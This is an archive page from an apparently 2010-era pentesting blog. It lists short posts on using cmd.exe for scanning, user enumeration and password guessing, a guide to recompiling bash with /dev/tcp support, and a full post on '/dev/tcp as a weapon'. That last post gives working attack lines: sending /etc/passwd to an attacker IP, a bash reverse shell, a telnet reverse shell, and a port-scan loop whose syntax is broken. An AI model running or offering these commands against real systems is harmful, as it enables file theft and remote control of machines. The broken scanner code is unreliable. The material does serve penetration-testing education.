Archive for the Fu (a.k.a Tips) Category

Weaponizing cmd.exe – Port Scanning

Posted in Fu (a.k.a Tips) on August 30, 2010 by Skyler

I have posted a cmd.exe entry for how to conduct port scans via cmd.exe

read it here on the new blog!

Weaponizing cmd.exe – UN/PW Guessing

Posted in Fu (a.k.a Tips) on August 27, 2010 by Skyler

This is a fantastic way to automate a dictionary attack on windows net accounts. This is part of my salute to Pentesting Ninjitsu.

See the full version on the new blog!

Continue reading

Weaponizing cmd.exe – Enumerate users (inspite of RestrictAnonymous)

Posted in Fu (a.k.a Tips) on August 26, 2010 by Skyler

Okay. Continuing on with the series. Now that we have  mapped the network, we need to enumerate users on the active hosts. Often times you will be preforming a Penetration Test on a windows machine. In the event that the machine has RestrictAnonymous set, you may find it difficult to enumerate users using your null session. It is important to note that this does not make it impossible! tools like enum rely upon the null session enumeration option,  therefore RestrictAnonymous = 2 ruins the use of that tool (and others like it). I am going to show you a method to brute force usernames in a different manner. For this you will need two tools, sid2user, and user2sid. You can get them here.

Read the rest of the post on the new blog!

Continue reading

Weaponizing cmd.exe – DNS Reverse Lookup

Posted in Fu (a.k.a Tips) on August 25, 2010 by Skyler

Here is a nice way to perform a reverse lookup of all the hosts on your network. It uses the nslookup <ip> command to do it.

Find the entire post on the new blog site!

Continue reading

Weaponizing cmd.exe – Ping Sweep

Posted in Fu (a.k.a Tips) on August 24, 2010 by Skyler
This is part of my tribute to PenTesting Ninjitsu. Here is a nice quick way to perform a ping sweep from the windows command line.
See the official post on the new blog!
Continue reading

Enabling /dev/tcp on Backtrack 4r1(Ubuntu)

Posted in Fu (a.k.a Tips) on August 23, 2010 by Skyler

After my post on weaponizing /dev/tcp, I had some kickback  from people trying to test it out. Users on a Debian based system will have issues since bash is not compiled with /dev/tcp enabled. All it requires is a quick recompiling of the shell, and a few changes after that:

Step 1: Download the latest BASH source

use a browser to get it here.

or

cd /tmp
sudo wget ftp.gnu.org/gnu/bash/bash-4.1.tar.gz

NOTE: Backtrack uses an older version of bash. I am not sure if they do this for any specific reason. I compiled 4.1 and havn’t had any issues. Let me know if you know otherwise

Step 2: Extract the source code

tar zxvf bash-4.1.tar.gz
cd bash-4.1

Step 3: Configure and install

sudo su
./configure --enable-net-redirections
make && make install

Step 4: Replace old version of bash with the new version

mv /bin/bash /bin/bash-OLD
ln -s /usr/local/bin/bash /bin/bash

Step 5: Test!

check to see if your new installation works. Close your current terminal, and reopn it. Then issue the following command and check the results:

reliks@bt:/tmp$ bash --version
GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)
..... reliks@bt:/tmp$ /bin/bash --version GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)
The versions returned should be that of which you just installed. They should also match.

You can now test to see if your access to /dev/tcp works:

cat < /dev/tcp/time.nist.gov/13

There you go! You should get back the time according to NIST.

Let me know if you have any issues! thanks!

/dev/tcp as a weapon

Posted in Fu (a.k.a Tips) on August 20, 2010 by Skyler

Here is some Fu to improve your game when pen testing *nix.

Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:

  1. Scope prevents you from uploading any files onto the machine
  2. A Firewall/AV prevents using something like netcat.

what do you do? Use /dev/tcp

What is /dev/tcp?

this is a system file that allows you to interact directly with the tcp protocol.

Fu

In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:

$ nc -l -p <port>

Transfer file:

This is pretty straight forward, just like you would image:

cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>

Back on your listener console, you would then see the contents of /etc/passwd displayed. You would then easily pipe that into a file for parsing or future reference.

Port Scanner

This piece or art comes from Pen Testing Ninjitsu. To create a port scanner using built in bash commands, this is what you are looking to do:

$port = 1; while [$port -lt 1024];do echo > /dev/tcp/<TARG_IP>/$port;
 [$? == 0] && echo $port "is open" >> /tmp/ports.txt; port = 'expr 
$port + 1'; done;

Let me break this down for you:

  • Create a variable called port, and set its value equal to 1
port = 1;
  • Create a loop that continues to run as long as the variable ‘port’ is less than 1024
while [$port -lt 1024];
  • For each iteration, send some packets to the target IP address, with the port number equal to the current value of  our ‘port’ variable
do echo > /dev/tcp/<TARG_IP>/$port;
  • Check to see what the bash error value is as a result of that echo into /dev/tcp. Check to see if it is equal to zero, or in other words, check to see if there were no errors
[$? == 0]
  • If it IS equal to zero, or in other words, there were no errors, append a string into /tmp/ports.txt stating that the last scanned port is open
&& echo $port "is open" >> /tmp/ports.txt;
  • Now increment the value of ‘port’ by 1, and finish this iteration of the loop.
port = 'expr $port + 1'; done;

Pretty messy, but also fairly straight forward. You could then just read

Backdoor/Reverse Shell

This is pretty slick in my opinion. Replicates netcat almost exactly. Not as pretty as some things, but still nice:

/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1

This is also straight forward:

  • Invoke an interactive bash shell
/bin/bash -i
  • Pipe that shell to the attacker (who has a netcat listener running)
> /dev/tcp/<Attacker_IP>/<port>
  • Take standard input, and connect it to standard output. Do the same with standard error (2>)
0<&1 2>&1

This can also be similarly done using telnet by doing the following (although you need two listeners):

telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>

Pretty elite. hope it helps!